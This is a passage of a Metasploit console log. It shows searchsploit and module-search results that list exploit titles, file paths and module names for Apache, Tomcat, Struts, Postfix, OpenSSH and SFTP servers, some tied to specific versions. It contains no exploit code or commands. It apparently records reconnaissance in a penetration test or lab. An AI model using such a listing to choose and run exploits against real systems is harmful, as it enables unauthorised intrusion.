552Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow | multiple/dos/21575.txt
553Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | unix/remote/21671.c
554Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | unix/remote/764.c
555Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c
556Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY | unix/remote/40347.txt
557Apache mod_wsgi - Information Disclosure | linux/remote/39196.py
558Apache MyFaces - 'ln' Information Disclosure | multiple/remote/36681.txt
559Apache MyFaces Tomahawk JSF Framework 1.1.5 - 'Autoscroll' Cross-Site Scripting | jsp/webapps/30191.txt
560Apache OFBiz - Admin Creator | multiple/remote/12264.txt
561Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/12330.txt
562Apache OFBiz - Remote Execution (via SQL Execution) | multiple/remote/12263.txt
563Apache OFBiz 10.4.x - Multiple Cross-Site Scripting Vulnerabilities | multiple/remote/38230.txt
564Apache OFBiz 16.11.04 - XML External Entity Injection | java/webapps/45673.py
565Apache OFBiz 16.11.05 - Cross-Site Scripting | multiple/webapps/45975.txt
566Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover) | java/webapps/48408.txt
567Apache Olingo OData 4.0 - XML External Entity Injection | java/webapps/47770.txt
568Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' File Directory Traversal | linux/webapps/39642.txt
569Apache Pluto 3.0.0 / 3.0.1 - Persistent Cross-Site Scripting | java/webapps/46759.txt
570Apache Portals Pluto 3.0.0 - Remote Code Execution | windows/webapps/45396.txt
571Apache Rave 0.11 < 0.20 - User Information Disclosure | multiple/webapps/24744.txt
572Apache Roller - OGNL Injection (Metasploit) | java/remote/29859.rb
573Apache Roller 5.0.3 - XML External Entity Injection (File Disclosure) | linux/webapps/45341.py
574Apache Shindig - XML External Entity Information Disclosure | multiple/remote/38813.txt
575Apache Shiro - Directory Traversal | multiple/remote/34952.txt
576Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit) | multiple/remote/48410.rb
577Apache Sling - Denial of Service | multiple/dos/37487.txt
578Apache Sling Framework (Adobe AEM) 2.3.6 - Information Disclosure | multiple/webapps/39435.txt
579Apache Solr - Remote Code Execution via Velocity Template (Metasploit) | multiple/remote/48338.rb
580Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution | xml/webapps/43009.txt
581Apache Solr 8.2.0 - Remote Code Execution | java/webapps/47572.py
582Apache SpamAssassin Milter Plugin 0.3.1 - Remote Command Execution | multiple/remote/11662.txt
583Apache Spark - (Unauthenticated) Command Execution (Metasploit) | java/remote/45925.rb
584Apache Spark Cluster 1.3.x - Arbitrary Code Execution | linux/remote/36562.txt
585Apache Struts - 'ParametersInterceptor' Remote Code Execution (Metasploit) | multiple/remote/24874.rb
586Apache Struts - ClassLoader Manipulation Remote Code Execution (Metasploit) | multiple/remote/33142.rb
587Apache Struts - Developer Mode OGNL Execution (Metasploit) | java/remote/31434.rb
588Apache Struts - Dynamic Method Invocation Remote Code Execution (Metasploit) | linux/remote/39756.rb
589Apache Struts - includeParams Remote Code Execution (Metasploit) | multiple/remote/25980.rb
590Apache Struts - Multiple Persistent Cross-Site Scripting Vulnerabilities | multiple/webapps/18452.txt
591Apache Struts - OGNL Expression Injection | multiple/remote/38549.txt
592Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Executio | multiple/remote/39919.rb
593Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Executio | multiple/remote/43382.py
594Apache Struts 1.2.7 - Error Response Cross-Site Scripting | multiple/remote/26542.txt
595Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution (Metasploit) | multiple/remote/27135.rb
596Apache Struts 2 - Namespace Redirect OGNL Injection (Metasploit) | multiple/remote/45367.rb
597Apache Struts 2 - Skill Name Remote Code Execution | multiple/remote/37647.txt
598Apache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit) | multiple/remote/44643.rb
599Apache Struts 2 < 2.3.1 - Multiple Vulnerabilities | multiple/webapps/18329.txt
600Apache Struts 2.0 - 'XSLTResult.java' Arbitrary File Upload | java/webapps/37009.xml
601Apache Struts 2.0.0 < 2.2.1.1 - XWork 's:submit' HTML Tag Cross-Site Scripting | multiple/remote/35735.txt
602Apache Struts 2.0.1 < 2.3.33 / 2.5 < 2.5.10 - Arbitrary Code Execution | multiple/remote/44556.py
603Apache Struts 2.0.9/2.1.8 - Session Tampering Security Bypass | multiple/remote/36426.txt
604Apache Struts 2.2.1.1 - Remote Command Execution (Metasploit) | multiple/remote/18984.rb
605Apache Struts 2.2.3 - Multiple Open Redirections | multiple/remote/38666.txt
606Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (1) | linux/remote/45260.py
607Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2) | multiple/remote/45262.py
608Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - 'Jakarta' Multipart Parser OGNL I | multiple/remote/41614.rb
609Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution | linux/webapps/41570.py
610Apache Struts 2.3.x Showcase - Remote Code Execution | multiple/webapps/42324.py
611Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution | linux/remote/42627.py
612Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Exec | multiple/remote/41690.rb
613Apache Struts < 2.2.0 - Remote Command Execution (Metasploit) | multiple/remote/17691.rb
614Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection | multiple/webapps/44583.txt
615Apache Subversion - Remote Denial of Service | linux/dos/38422.txt
616Apache Subversion 1.6.x - 'mod_dav_svn/lock.c' Remote Denial of Service | linux/dos/38421.txt
617Apache suEXEC - Information Disclosure / Privilege Escalation | linux/remote/27397.txt
618Apache Superset < 0.23 - Remote Code Execution | linux/webapps/45933.py
619Apache Syncope 2.0.7 - Remote Code Execution | windows/webapps/45400.txt
620Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit) | windows/remote/47208.rb
621Apache Tika-server < 1.18 - Command Injection | windows/remote/46540.py
622Apache Tomcat (Windows) - 'runtime.getRuntime().exec()' Local Privilege Escalat | windows/local/7264.txt
623Apache Tomcat - 'WebDAV' Remote File Disclosure | multiple/remote/4530.pl
624Apache Tomcat - Account Scanner / 'PUT' Request Command Execution | multiple/remote/18619.txt
625Apache Tomcat - AJP 'Ghostcat File Read/Inclusion | multiple/webapps/48143.py
626Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (Metasp | windows/remote/47073.rb
627Apache Tomcat - Cookie Quote Handling Remote Information Disclosure | multiple/remote/9994.txt
628Apache Tomcat - Form Authentication 'Username' Enumeration | multiple/remote/9995.txt
629Apache Tomcat - WebDAV SSL Remote File Disclosure | linux/remote/4552.pl
630Apache Tomcat / Geronimo 1.0 - 'Sample Script cal2.jsp?time' Cross-Site Scripti | multiple/remote/27095.txt
631Apache Tomcat 3.0 - Directory Traversal | windows/remote/20716.txt
632Apache Tomcat 3.1 - Path Revealing | multiple/remote/20131.txt
633Apache Tomcat 3.2 - 404 Error Page Cross-Site Scripting | multiple/remote/33379.txt
634Apache Tomcat 3.2 - Directory Disclosure | unix/remote/21882.txt
635Apache Tomcat 3.2.1 - 404 Error Page Cross-Site Scripting | multiple/webapps/10292.txt
636Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosuree | multiple/remote/21492.txt
637Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Information Disclosure | multiple/remote/21490.txt
638Apache Tomcat 3.2.3/3.2.4 - Example Files Web Root Full Path Disclosure | multiple/remote/21491.txt
639Apache Tomcat 3.x - Null Byte Directory / File Disclosure | linux/remote/22205.txt
640Apache Tomcat 3/4 - 'DefaultServlet' File Disclosure | unix/remote/21853.txt
641Apache Tomcat 3/4 - JSP Engine Denial of Service | linux/dos/21534.jsp
642Apache Tomcat 4.0.3 - Denial of Service 'Device Name' / Cross-Site Scripting | windows/webapps/21605.txt
643Apache Tomcat 4.0.3 - Requests Containing MS-DOS Device Names Information Discl | multiple/remote/31551.txt
644Apache Tomcat 4.0.3 - Servlet Mapping Cross-Site Scripting | linux/remote/21604.txt
645Apache Tomcat 4.0.x - Non-HTTP Request Denial of Service | linux/dos/23245.pl
646Apache Tomcat 4.0/4.1 - Servlet Full Path Disclosure | unix/remote/21412.txt
647Apache Tomcat 4.1 - JSP Request Cross-Site Scripting | unix/remote/21734.txt
648Apache Tomcat 5 - Information Disclosure | multiple/remote/28254.txt
649Apache Tomcat 5.5.0 < 5.5.29 / 6.0.0 < 6.0.26 - Information Disclosure | multiple/remote/12343.txt
650Apache Tomcat 5.5.15 - cal2.jsp Cross-Site Scripting | jsp/webapps/30563.txt
651Apache Tomcat 5.5.25 - Cross-Site Request Forgery | multiple/webapps/29435.txt
652Apache Tomcat 5.x/6.0.x - Directory Traversal | linux/remote/29739.txt
653Apache Tomcat 6.0.10 - Documentation Sample Application Multiple Cross-Site Scr | multiple/remote/30052.txt
654Apache Tomcat 6.0.13 - Host Manager Servlet Cross-Site Scripting | multiple/remote/30495.html
655Apache Tomcat 6.0.13 - Insecure Cookie Handling Quote Delimiter Session ID Disc | multiple/remote/30496.txt
656Apache Tomcat 6.0.13 - JSP Example Web Applications Cross-Site Scripting | jsp/webapps/30189.txt
657Apache Tomcat 6.0.15 - Cookie Quote Handling Remote Information Disclosure | multiple/remote/31130.txt
658Apache Tomcat 6.0.16 - 'HttpServletResponse.sendError()' Cross-Site Scripting | multiple/remote/32138.txt
659Apache Tomcat 6.0.16 - 'RequestDispatcher' Information Disclosure | multiple/remote/32137.txt
660Apache Tomcat 6.0.18 - Form Authentication Existing/Non-Existing 'Username' Enu | multiple/remote/33023.txt
661Apache Tomcat 6/7/8/9 - Information Disclosure | multiple/remote/41783.txt
662Apache Tomcat 7.0.4 - 'sort' / 'orderBy' Cross-Site Scripting | linux/remote/35011.txt
663Apache Tomcat 8/7/6 (Debian-Based Distros) - Local Privilege Escalation | linux/local/40450.txt
664Apache Tomcat 8/7/6 (RedHat Based Distros) - Local Privilege Escalation | linux/local/40488.txt
665Apache Tomcat < 5.5.17 - Remote Directory Listing | multiple/remote/2061.txt
666Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal | unix/remote/14489.c
667Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC) | multiple/remote/6229.txt
668Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypas | jsp/webapps/42966.py
669Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypas | windows/webapps/42953.txt
670Apache Tomcat Connector jk2-2.0.2 mod_jk2 - Remote Overflow | linux/remote/5386.txt
671Apache Tomcat Connector mod_jk - 'exec-shield' Remote Overflow | linux/remote/4162.c
672Apache Tomcat Manager - Application Deployer (Authenticated) Code Execution (Me | multiple/remote/16317.rb
673Apache Tomcat Manager - Application Upload (Authenticated) Code Execution (Meta | multiple/remote/31433.rb
674Apache Tomcat mod_jk 1.2.20 - Remote Buffer Overflow (Metasploit) | windows/remote/16798.rb
675Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marsh | php/remote/28713.php
676Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Ex | multiple/remote/46544.py
677Apache Web Server 2.0.x - MS-DOS Device Name Denial of Service | linux/dos/22191.pl
678Apache Win32 1.3.x/2.0.x - Batch File Remote Command Execution | windows/remote/21350.pl
679Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC) | linux/dos/36906.txt
680Apache2Triad 1.5.4 - Multiple Vulnerabilities | php/webapps/42520.txt
681Apache::Gallery 0.4/0.5/0.6 - Insecure File Storage Privilege Escalation | linux/local/23119.c
682AWStats 6.x - Apache Tomcat Configuration File Arbitrary Command Execution | cgi/webapps/35035.txt
683Bea Weblogic Apache Connector - Code Execution / Denial of Service | windows/remote/6089.pl
684Cobalt RaQ 2.0/3.0 - Apache .htaccess Disclosure | multiple/remote/19828.txt
685htpasswd Apache 1.3.31 - Local Overflow | linux/local/466.pl
686Joomla! Component com_intuit - Apache Directory listing Download | php/webapps/10811.txt
687NCSA 1.3/1.4.x/1.5 / Apache HTTPd 0.8.11/0.8.14 - ScriptAlias Source Retrieval | multiple/remote/20595.txt
688Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - 'PDF/Docx' Server Side | php/dos/44057.md
689Oracle Weblogic Apache Connector - POST Buffer Overflow (Metasploit) | windows/remote/18897.rb
690PHP 5.4.3 - apache_request_headers Function Buffer Overflow (Metasploit) | windows/remote/19231.rb
691RedHat Apache 2.0.40 - Directory Index Default Configuration Error | linux/remote/23296.txt
692RedHat Linux 7.0 Apache - Remote Username Enumeration | linux/remote/21112.php
693Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Executio | linux/remote/34.pl
694-------------------------------------------------------------------------------- ---------------------------------
695Shellcodes: No Results
696msf5 > searchsploit Apache 2.4.10
697[*] exec: searchsploit Apache 2.4.10
698
699-------------------------------------------------------------------------------- ---------------------------------
700 Exploit Title | Path
701-------------------------------------------------------------------------------- ---------------------------------
702Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution | php/remote/29290.c
703Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | php/remote/29316.py
704Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak | linux/webapps/42745.py
705Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service | multiple/dos/26710.txt
706Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | unix/remote/21671.c
707Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | unix/remote/764.c
708Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c
709Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' File Directory Traversal | linux/webapps/39642.txt
710Apache Tomcat < 5.5.17 - Remote Directory Listing | multiple/remote/2061.txt
711Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal | unix/remote/14489.c
712Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC) | multiple/remote/6229.txt
713Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypas | jsp/webapps/42966.py
714Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypas | windows/webapps/42953.txt
715Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC) | linux/dos/36906.txt
716Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Executio | linux/remote/34.pl
717-------------------------------------------------------------------------------- ---------------------------------
718Shellcodes: No Results
719msf5 > search Apache 2.4.10
720
721Matching Modules
722================
723
724 # Name Disclosure Date Rank Check Description
725 - ---- --------------- ---- ----- -----------
726 0 auxiliary/admin/appletv/appletv_display_video normal No Apple TV Video Remote Control
727 1 auxiliary/admin/http/tomcat_administration normal No Tomcat Administration Tool Default Access
728 2 auxiliary/admin/http/tomcat_utf8_traversal 2009-01-09 normal No Tomcat UTF-8 Directory Traversal Vulnerability
729 3 auxiliary/admin/http/trendmicro_dlp_traversal 2009-01-09 normal No TrendMicro Data Loss Prevention 5.5 Directory Traversal
730 4 auxiliary/dos/http/apache_commons_fileupload_dos 2014-02-06 normal No Apache Commons FileUpload and Apache Tomcat DoS
731 5 auxiliary/dos/http/apache_mod_isapi 2010-03-05 normal No Apache mod_isapi Dangling Pointer
732 6 auxiliary/dos/http/apache_range_dos 2011-08-19 normal No Apache Range Header DoS (Apache Killer)
733 7 auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 normal No Apache Tomcat Transfer-Encoding Information Disclosure and DoS
734 8 auxiliary/fileformat/odt_badodt 2018-05-01 normal No LibreOffice 6.03 /Apache OpenOffice 4.1.5 Malicious ODT File Generator
735 9 auxiliary/gather/apache_rave_creds normal No Apache Rave User Information Disclosure
736 10 auxiliary/gather/impersonate_ssl normal No HTTP SSL Certificate Impersonation
737 11 auxiliary/scanner/couchdb/couchdb_enum normal Yes CouchDB Enum Utility
738 12 auxiliary/scanner/http/apache_activemq_source_disclosure normal No Apache ActiveMQ JSP Files Source Disclosure
739 13 auxiliary/scanner/http/apache_activemq_traversal normal No Apache ActiveMQ Directory Traversal
740 14 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
741 15 auxiliary/scanner/http/apache_optionsbleed 2017-09-18 normal No Apache Optionsbleed Scanner
742 16 auxiliary/scanner/http/apache_userdir_enum normal No Apache "mod_userdir" User Enumeration
743 17 auxiliary/scanner/http/axis_local_file_include normal No Apache Axis2 v1.4.1 Local File Inclusion
744 18 auxiliary/scanner/http/axis_login normal No Apache Axis2 Brute Force Utility
745 19 auxiliary/scanner/http/mod_negotiation_brute normal No Apache HTTPD mod_negotiation Filename Bruter
746 20 auxiliary/scanner/http/mod_negotiation_scanner normal No Apache HTTPD mod_negotiation Scanner
747 21 auxiliary/scanner/http/rewrite_proxy_bypass normal No Apache Reverse Proxy Bypass Vulnerability Scanner
748 22 auxiliary/scanner/http/tomcat_enum normal No Apache Tomcat User Enumeration
749 23 auxiliary/scanner/http/tomcat_mgr_login normal No Tomcat Application Manager Login Utility
750 24 auxiliary/scanner/http/wangkongbao_traversal normal No WANGKONGBAO CNS-1000 and 1100 UTM Directory Traversal
751 25 auxiliary/scanner/ssh/apache_karaf_command_execution 2016-02-09 normal No Apache Karaf Default Credentials Command Execution
752 26 auxiliary/scanner/ssh/karaf_login normal No Apache Karaf Login Utility
753 27 exploit/linux/http/apache_continuum_cmd_exec 2016-04-06 excellent Yes Apache Continuum Arbitrary Command Execution
754 28 exploit/linux/http/apache_couchdb_cmd_exec 2016-04-06 excellent Yes Apache CouchDB Arbitrary Command Execution
755 29 exploit/linux/http/atutor_filemanager_traversal 2016-03-01 excellent Yes ATutor 2.2.1 Directory Traversal / Remote Code Execution
756 30 exploit/linux/http/cisco_prime_inf_rce 2018-10-04 excellent Yes Cisco Prime Infrastructure Unauthenticated Remote Code Execution
757 31 exploit/linux/http/cpi_tararchive_upload 2019-05-15 excellent Yes Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability
758 32 exploit/linux/http/eyesofnetwork_autodiscovery_rce 2020-02-06 excellent Yes EyesOfNetwork AutoDiscovery Target Command Execution
759 33 exploit/linux/http/hadoop_unauth_exec 2016-10-19 excellent Yes Hadoop YARN ResourceManager Unauthenticated Command Execution
760 34 exploit/linux/http/piranha_passwd_exec 2000-04-04 excellent No RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution
761 35 exploit/linux/http/rconfig_ajaxarchivefiles_rce 2020-03-11 good Yes Rconfig 3.x Chained Remote Code Execution
762 36 exploit/linux/http/spark_unauth_rce 2017-12-12 excellent Yes Apache Spark Unauthenticated Command Execution
763 37 exploit/linux/http/symantec_web_gateway_lfi 2012-05-17 excellent Yes Symantec Web Gateway 5.0.2.8 relfile File Inclusion Vulnerability
764 38 exploit/linux/local/kloxo_lxsuexec 2012-09-18 excellent No Kloxo Local Privilege Escalation
765 39 exploit/linux/smtp/apache_james_exec 2015-10-01 normal Yes Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write
766 40 exploit/multi/fileformat/zip_slip 2018-06-05 manual No Generic Zip Slip Traversal Vulnerability
767 41 exploit/multi/http/apache_activemq_upload_jsp 2016-06-01 excellent No ActiveMQ web shell upload
768 42 exploit/multi/http/apache_jetspeed_file_upload 2016-03-06 manual No Apache Jetspeed Arbitrary File Upload
769 43 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
770 44 exploit/multi/http/apache_roller_ognl_injection 2013-10-31 excellent Yes Apache Roller OGNL Injection
771 45 exploit/multi/http/cisco_dcnm_upload_2019 2019-06-26 excellent Yes Cisco Data Center Network Manager Unauthenticated Remote Code Execution
772 46 exploit/multi/http/shiro_rememberme_v124_deserialize 2016-06-07 excellent No Apache Shiro v1.2.4 Cookie RememberME Deserial RCE
773 47 exploit/multi/http/solr_velocity_rce 2019-10-29 excellent Yes Apache Solr Remote Code Execution via Velocity Template
774 48 exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli 2014-07-24 excellent Yes Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection
775 49 exploit/multi/http/struts2_code_exec_showcase 2017-07-07 excellent Yes Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution
776 50 exploit/multi/http/struts2_content_type_ognl 2017-03-07 excellent Yes Apache Struts Jakarta Multipart Parser OGNL Injection
777 51 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
778 52 exploit/multi/http/struts2_rest_xstream 2017-09-05 excellent Yes Apache Struts 2 REST Plugin XStream RCE
779 53 exploit/multi/http/struts_code_exec 2010-07-13 good No Apache Struts Remote Command Execution
780 54 exploit/multi/http/struts_code_exec_classloader 2014-03-06 manual No Apache Struts ClassLoader Manipulation Remote Code Execution
781 55 exploit/multi/http/struts_code_exec_exception_delegator 2012-01-06 excellent No Apache Struts Remote Command Execution
782 56 exploit/multi/http/struts_code_exec_parameters 2011-10-01 excellent Yes Apache Struts ParametersInterceptor Remote Code Execution
783 57 exploit/multi/http/struts_default_action_mapper 2013-07-02 excellent Yes Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
784 58 exploit/multi/http/struts_dev_mode 2012-01-06 excellent Yes Apache Struts 2 Developer Mode OGNL Execution
785 59 exploit/multi/http/struts_dmi_exec 2016-04-27 excellent Yes Apache Struts Dynamic Method Invocation Remote Code Execution
786 60 exploit/multi/http/struts_dmi_rest_exec 2016-06-01 excellent Yes Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution
787 61 exploit/multi/http/struts_include_params 2013-05-24 great Yes Apache Struts includeParams Remote Code Execution
788 62 exploit/multi/http/tomcat_jsp_upload_bypass 2017-10-03 excellent Yes Tomcat RCE via JSP Upload Bypass
789 63 exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Yes Apache Tomcat Manager Application Deployer Authenticated Code Execution
790 64 exploit/multi/http/tomcat_mgr_upload 2009-11-09 excellent Yes Apache Tomcat Manager Authenticated Upload Code Execution
791 65 exploit/multi/misc/openoffice_document_macro 2017-02-08 excellent No Apache OpenOffice Text Document Malicious Macro Execution
792 66 exploit/unix/http/contentkeeperweb_mimencode 2009-02-25 excellent Yes ContentKeeper Web Remote Command Execution
793 67 exploit/unix/misc/spamassassin_exec 2006-06-06 excellent No SpamAssassin spamd Remote Command Execution
794 68 exploit/unix/webapp/jquery_file_upload 2018-10-09 excellent Yes blueimp's jQuery (Arbitrary) File Upload
795 69 exploit/unix/webapp/moinmoin_twikidraw 2012-12-30 manual Yes MoinMoin twikidraw Action Traversal File Upload
796 70 exploit/unix/webapp/projectpier_upload_exec 2012-10-08 excellent Yes Project Pier Arbitrary File Upload Vulnerability
797 71 exploit/unix/webapp/spip_connect_exec 2012-07-04 excellent Yes SPIP connect Parameter PHP Injection
798 72 exploit/unix/webapp/wp_phpmailer_host_header 2017-05-03 average Yes WordPress PHPMailer Host Header Command Injection
799 73 exploit/windows/http/apache_activemq_traversal_upload 2015-08-19 excellent Yes Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload
800 74 exploit/windows/http/apache_chunked 2002-06-19 good Yes Apache Win32 Chunked Encoding
801 75 exploit/windows/http/apache_mod_rewrite_ldap 2006-07-28 great Yes Apache Module mod_rewrite LDAP Protocol Buffer Overflow
802 76 exploit/windows/http/apache_modjk_overflow 2007-03-02 great Yes Apache mod_jk 1.2.20 Buffer Overflow
803 77 exploit/windows/http/apache_tika_jp2_jscript 2018-04-25 excellent Yes Apache Tika Header Command Injection
804 78 exploit/windows/http/bea_weblogic_jsessionid 2009-01-13 good No BEA WebLogic JSESSIONID Cookie Value Overflow
805 79 exploit/windows/http/bea_weblogic_post_bof 2008-07-17 great Yes Oracle Weblogic Apache Connector POST Request Buffer Overflow
806 80 exploit/windows/http/bea_weblogic_transfer_encoding 2008-09-09 great No BEA Weblogic Transfer-Encoding Buffer Overflow
807 81 exploit/windows/http/php_apache_request_headers_bof 2012-05-08 normal No PHP apache_request_headers Function Buffer Overflow
808 82 exploit/windows/http/tomcat_cgi_cmdlineargs 2019-04-10 excellent Yes Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
809 83 exploit/windows/misc/ibm_websphere_java_deserialize 2015-11-06 excellent No IBM WebSphere RCE Java Deserialization Vulnerability
810 84 payload/php/shell_findsock normal No PHP Command Shell, Find Sock
811 85 post/linux/gather/enum_configs normal No Linux Gather Configurations
812 86 post/windows/gather/enum_tomcat normal No Windows Gather Apache Tomcat Enumeration
813
814
815msf5 > searchsploit Postfix smtpd
816[*] exec: searchsploit Postfix smtpd
817
818Exploits: No Results
819Shellcodes: No Results
820msf5 > searchsploit Postfix
821[*] exec: searchsploit Postfix
822
823------------------------------------------------------------------------------------------- ---------------------------------
824 Exploit Title | Path
825------------------------------------------------------------------------------------------- ---------------------------------
826gld 1.4 - Postfix Greylisting Daemon Remote Format String | linux/remote/934.c
827Postfix 1.1.x - Denial of Service (1) | linux/dos/22981.c
828Postfix 1.1.x - Denial of Service (2) | linux/dos/22982.pl
829Postfix 2.6-20080814 - 'symlink' Local Privilege Escalation | linux/local/6337.sh
830Postfix < 2.4.9/2.5.5/2.6-20080902 - '.forward' Local Denial of Service | multiple/dos/6472.c
831Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection | linux/remote/34896.py
832Salim Gasmi GLD (Greylisting Daemon) - Postfix Buffer Overflow (Metasploit) | linux/remote/16841.rb
833Salim Gasmi GLD (Greylisting Daemon) 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Meta | linux/remote/10023.rb
834Salim Gasmi GLD (Greylisting Daemon) 1.x - Postfix Greylisting Daemon Buffer Overflow | linux/remote/25392.c
835------------------------------------------------------------------------------------------- ---------------------------------
836Shellcodes: No Results
837msf5 > search postfix
838
839Matching Modules
840================
841
842 # Name Disclosure Date Rank Check Description
843 - ---- --------------- ---- ----- -----------
844 0 auxiliary/admin/http/pfadmin_set_protected_alias 2017-02-03 normal Yes Postfixadmin Protected Alias Deletion Vulnerability
845 1 exploit/linux/misc/gld_postfix 2005-04-12 good No GLD (Greylisting Daemon) Postfix Buffer Overflow
846
847
848msf5 > searchsploit OpenSSH 5.1p1
849[*] exec: searchsploit OpenSSH 5.1p1
850
851------------------------------------------------------------------------------------------- ---------------------------------
852 Exploit Title | Path
853------------------------------------------------------------------------------------------- ---------------------------------
854OpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py
855OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | linux/remote/45210.py
856OpenSSH < 6.6 SFTP (x64) - Command Execution | linux_x86-64/remote/45000.c
857OpenSSH < 6.6 SFTP - Command Execution | linux/remote/45001.py
858OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege | linux/local/40962.txt
859OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading | linux/remote/40963.txt
860OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py
861------------------------------------------------------------------------------------------- ---------------------------------
862Shellcodes: No Results
863msf5 > search OpenSSH
864
865Matching Modules
866================
867
868 # Name Disclosure Date Rank Check Description
869 - ---- --------------- ---- ----- -----------
870 0 auxiliary/scanner/ssh/ssh_enumusers normal No SSH Username Enumeration
871 1 exploit/windows/local/unquoted_service_path 2001-10-25 excellent Yes Windows Unquoted Service Path Privilege Escalation
872 2 post/multi/gather/ssh_creds normal No Multi Gather OpenSSH PKI Credentials Collection
873 3 post/windows/manage/forward_pageant normal No Forward SSH Agent Requests To Remote Pageant
874 4 post/windows/manage/install_ssh normal No Install OpenSSH for Windows
875
876
877msf5 > search SFTP
878
879Matching Modules
880================
881
882 # Name Disclosure Date Rank Check Description
883 - ---- --------------- ---- ----- -----------
884 0 auxiliary/scanner/ssh/cerberus_sftp_enumusers 2014-05-27 normal No Cerberus FTP Server SFTP Username Enumeration
885 1 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
886 2 exploit/windows/ftp/easyftp_cwd_fixret 2010-02-16 great Yes EasyFTP Server CWD Command Stack Buffer Overflow
887 3 exploit/windows/ftp/easyftp_mkd_fixret 2010-04-04 great Yes EasyFTP Server MKD Command Stack Buffer Overflow
888 4 exploit/windows/ftp/wsftp_server_503_mkd 2004-11-29 great Yes WS-FTP Server 5.03 MKD Overflow
889 5 exploit/windows/ftp/wsftp_server_505_xmd5 2006-09-14 average Yes Ipswitch WS_FTP Server 5.05 XMD5 Overflow
890 6 exploit/windows/http/easyftp_list 2010-02-18 great Yes EasyFTP Server list.html path Stack Buffer Overflow
